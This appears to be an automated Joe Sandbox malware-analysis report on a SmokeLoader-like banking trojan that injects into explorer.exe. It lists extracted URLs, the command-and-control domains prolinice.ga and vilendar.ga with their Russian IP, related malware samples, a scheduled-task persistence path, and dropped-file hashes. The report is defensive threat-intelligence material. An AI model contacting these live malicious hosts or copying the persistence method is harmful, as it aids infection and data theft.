                    https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe | 0% | URL Reputation | safe
                    https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at | 0% | URL Reputation | safe
                    https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of | 0% | URL Reputation | safe
                    http://vilendar.ga/index.php | 100% | Avira URL Cloud | malware
                    http://prolinice.ga/index.php | 0% | Avira URL Cloud | safe
                    http://www.autoitscript.com/autoit3/J | 0% | Avira URL Cloud | safe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
                    http://prolinice.ga/ | 0% | Avira URL Cloud | safe
                    http://prolinice.ga/= | 0% | Avira URL Cloud | safe
                    http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0 | 0% | Avira URL Cloud | safe
                    http://prolinice.ga/index.phpMozilla/5.0 | 0% | Avira URL Cloud | safe
                    http://prolinice.ga:80/index.php | 0% | Avira URL Cloud | safe
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    prolinice.ga | 77.232.129.190 | true | true | | unknown
                    Name | Malicious | Antivirus Detection | Reputation
                    http://prolinice.ga/index.php | true | Avira URL Cloud: safe | unknown
                    http://vilendar.ga/index.php | true | Avira URL Cloud: malware | unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1727291889.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://duckduckgo.com/chrome_newtabexplorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.miexplorer.exe, 00000001.00000000.1729353943.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://prolinice.ga/ndex.phpexplorer.exe, 00000006.00000002.1956613264.000000000327F000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/ac/?q=explorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1727291889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://powerpoint.office.comcemberexplorer.exe, 00000001.00000000.1731083282.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1728897911.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.drfalse
                      • URL Reputation: safe
                      unknown
                      https://excel.office.comexplorer.exe, 00000001.00000000.1731083282.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.microexplorer.exe, 00000001.00000000.1727963617.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1728370033.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1729676503.0000000009B60000.00000002.00000001.00040000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000001.00000000.1727291889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchexplorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.drfalse
                      • URL Reputation: safe
                      unknown
                      https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://api.msn.com/qexplorer.exe, 00000001.00000000.1728897911.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000001.00000000.1731083282.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1727291889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000001.00000000.1731083282.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1731083282.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://word.office.comexplorer.exe, 00000001.00000000.1731083282.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      Name | Source | Malicious | Antivirus Detection | Reputation
                      https://www.google.com/images/branding/product/ico/googleg_lodp.ico | explorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.dr | false | Avira URL Cloud: safe | unknown
                      http://prolinice.ga/ | explorer.exe, 00000006.00000002.1956613264.0000000003228000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.1956613264.0000000003294000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
                      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu | explorer.exe, 00000001.00000000.1727291889.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://prolinice.ga/= | explorer.exe, 00000006.00000002.1956613264.0000000003294000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent | explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win | explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | explorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.dr | false | Avira URL Cloud: safe | unknown
                      http://prolinice.ga:80/index.php | explorer.exe, 00000006.00000002.1956613264.0000000003294000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://schemas.micr | explorer.exe, 00000001.00000000.1729353943.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://www.ecosia.org/newtab/ | explorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.dr | false | URL Reputation: safe | unknown
                      https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow- | explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://aka.ms/Vh5j3k | explorer.exe, 00000001.00000000.1727291889.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://ac.ecosia.org/autocomplete?q= | explorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.dr | false | URL Reputation: safe | unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu | explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://api.msn.com/v1/news/Feed/Windows?& | explorer.exe, 00000001.00000000.1728897911.00000000096DF000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg | explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark | explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://www.rd.com/list/polite-habits-campers-dislike/ | explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://android.notify.windows.com/iOS | explorer.exe, 00000001.00000000.1731083282.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0 | explorer.exe, 00000006.00000002.1956613264.0000000003294000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar | explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img | explorer.exe, 00000001.00000000.1727291889.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://api.msn.com/ | explorer.exe, 00000001.00000000.1728897911.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d | explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://prolinice.ga/index.phpMozilla/5.0 | explorer.exe, 00000006.00000002.1956613264.0000000003228000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.1944673317.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.1955894344.0000000002F57000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2944561786.0000000000698000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2127081102.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2944628748.0000000002E77000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2943892684.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2944692360.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2943579031.00000000004E8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      https://outlook.com_ | explorer.exe, 00000001.00000000.1731083282.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | explorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.dr | false | URL Reputation: safe | unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark | explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://www.msn.com:443/en-us/feed | explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe | explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at | explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of | explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IP | Domain | Country | ASN | ASN Name | Malicious
                      77.232.129.190 | prolinice.ga | Russian Federation | 42145 | BSTV-ASRU | true
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1448294
                      Start date and time:2024-05-28 08:22:43 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 6s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of new started processes analysed:18
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:1
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe
                      Detection:MAL
                      Classification:mal100.bank.troj.spyw.evad.winEXE@21/15@1/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 96%
                      • Number of executed functions: 106
                      • Number of non-executed functions: 89
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 20.189.173.22
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                      • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • Not all processes were analyzed; report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtEnumerateKey calls found.
                      • Report size getting too big, too many NtOpenFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      Time | Type | Description
                      02:23:59 | API Interceptor | 133836x Sleep call for process: explorer.exe modified
                      02:24:19 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                      07:23:58 | Task Scheduler | Run new task: Firefox Default Browser Agent A0E47F6C8157959D path: C:\Users\user\AppData\Roaming\rrrrcve
                      Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                      77.232.129.190 | #20240627_Edlen_A.xls | Get hash | malicious | SmokeLoader | Browse | prolinice.ga/index.php
                      Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                      prolinice.ga | #20240627_Edlen_A.xls | Get hash | malicious | SmokeLoader | Browse | 77.232.129.190
                      Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                      BSTV-ASRU | #20240627_Edlen_A.xls | Get hash | malicious | SmokeLoader | Browse | 77.232.129.190
                      BSTV-ASRU | RkdXl7E3rG.exe | Get hash | malicious | AsyncRAT | Browse | 77.232.132.25
                      BSTV-ASRU | nMbRell419.exe | Get hash | malicious | AsyncRAT, GMiner, Quasar | Browse | 77.232.132.25
                      BSTV-ASRU | 2ctyhHi7vb.exe | Get hash | malicious | AsyncRAT, GMiner, Quasar | Browse | 77.232.132.25
                      BSTV-ASRU | jOR8nr6mAC.exe | Get hash | malicious | Quasar | Browse | 77.232.132.25
                      BSTV-ASRU | kPl1mZTpru.exe | Get hash | malicious | Tofsee | Browse | 77.232.138.239
                      BSTV-ASRU | mtxfh5xJDf.exe | Get hash | malicious | Quasar | Browse | 77.232.132.25
                      BSTV-ASRU | file.exe | Get hash | malicious | Tofsee | Browse | 77.232.132.142
                      BSTV-ASRU | BMTxyapegR.exe | Get hash | malicious | AsyncRAT | Browse | 77.232.132.25
                      BSTV-ASRU | q05RiWoYOi | Get hash | malicious | Mirai | Browse | 77.232.157.125
                      No context
                      No context
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):65536
                      Entropy (8bit):0.9426999761880487
                      Encrypted:false
                      SSDEEP:192:NmMTeCnQ0LZTkrjyaVwzuiF/Z24lO8kT:lKCnrLZTWjKzuiF/Y4lO8kT
                      MD5:5D820F184B05E8A8523D59AEA644A73C
                      SHA1:8F797015C00EB13764B719D1BD6BAA225745091C
                      SHA-256:E49EF49C343DCAD6FDC2DEAAA2462361A5B34B630111243202898E62E71A2C85
                      SHA-512:764D95936C071EF32A3C6A459B9C8A892CE596E2614C904878E531709194CD88B9276C46691B52A9701DFF2A795C172FCA9D42FD1C7E6AA04D86A1929429F581
                      Malicious:false
                      Reputation:low
                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.1.3.5.1.0.4.7.6.8.8.4.0.4.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.1.3.5.1.0.4.8.4.0.7.1.5.4.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.c.2.7.a.b.4.b.-.6.a.e.5.-.4.d.c.d.-.a.8.9.c.-.b.4.e.d.2.f.3.6.2.b.1.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.a.a.1.e.a.8.-.2.0.e.e.-.4.2.e.e.-.8.a.7.5.-.0.9.1.f.0.2.e.0.e.6.8.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.e.x.p.l.o.r.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.2.4.-.0.0.0.1.-.0.0.1.4.-.6.4.5.7.-.2.d.a.3.c.7.b.0.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:Mini DuMP crash report, 14 streams, Tue May 28 06:24:07 2024, 0x1205a4 type
                      Category:dropped
                      Size (bytes):58918
                      Entropy (8bit):1.5452193116090096
                      Encrypted:false
                      SSDEEP:96:5z8ZulQphpObaZDKeLMREX4eAdbEZJR99Dm+z4ugbsi72Aqxm+c2F65jmy5VmtgI:WHDybE7RGsxO2pxdsNbFi1qGg/lViTR
                      MD5:B8C07AF64786B6F2B9F76668A2EFD820
                      SHA1:CB917B166A836D64FD51D0DA208D0DAE9B233DD5
                      SHA-256:C4874156AE6496CCBEB376C2F2ED6FD6222E14F1EDC9F272A073528D9EADB7C2
                      SHA-512:CA6BFE552ADB8FF1BEFE55ED96AB459F2FC07EE1A14B64C2FFF2D8414F74217E7CDC478BF2F94EE199E6B8D996F377DF72BC66DCF431EAEE4C99D3409AFF784B
                      Malicious:false
                      Preview:MDMP..a..... ........xUf.........................................7..........T.......8...........T...........0...............L...........8...............................................................................eJ..............Lw......................T.......$....xUf............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):8560
                      Entropy (8bit):3.693949846702332
                      Encrypted:false
                      SSDEEP:192:R6l7wVeJVeI6Y9L7gmfqtjb1+pDz89b5iCfbTm:R6lXJcI6YR7gmfqtjB35nf+
                      MD5:8AB0A0BB36FC28182C5A32FE85EDB403
                      SHA1:E6951A66765E7161F8EA8B36F0EB50A7AA8F3817
                      SHA-256:9A63805185E7F5973531A1BC2A18CEB5C6E66E996F2439055BF836078564A642
                      SHA-512:98FDA4CB02C792ED96F4CFB3B18A1893A68896A57BD1F6C8762B1C5BDF0CF3BC3D5B47A513B63AE926D404467489D93560BC154A33A5C9D6088B52D855A22B74
                      Malicious:false
                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.1.6.<./.P.i.
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):4719
                      Entropy (8bit):4.448719722969122
                      Encrypted:false
                      SSDEEP:48:cvIwWl8zs4Jg771I98CWWpW8VY4INPYm8M4JYcFOyq85MgAb9Q3hd:uIjf+I7e37Vn8SJGkAba3hd
                      MD5:5253A6D8B863E871E3314939AAA28707
                      SHA1:8D55965094C44DF58AF250F3389F785E8056A7A0
                      SHA-256:7EE0619D84586321249DBC8C3491476A1D7A50FC94FCECB2C92A48C675868A0B
                      SHA-512:F5EFB0F6292480D5261BEAB8139CF1CBC42D5636A5DDD77813302D36BB2A6F4671964049A2A792D35F56EEDDED5DB8DEF9936D006767E7F84AADE1EBA8F078CD
                      Malicious:false
                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="342566" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                      Process:C:\Windows\SysWOW64\explorer.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
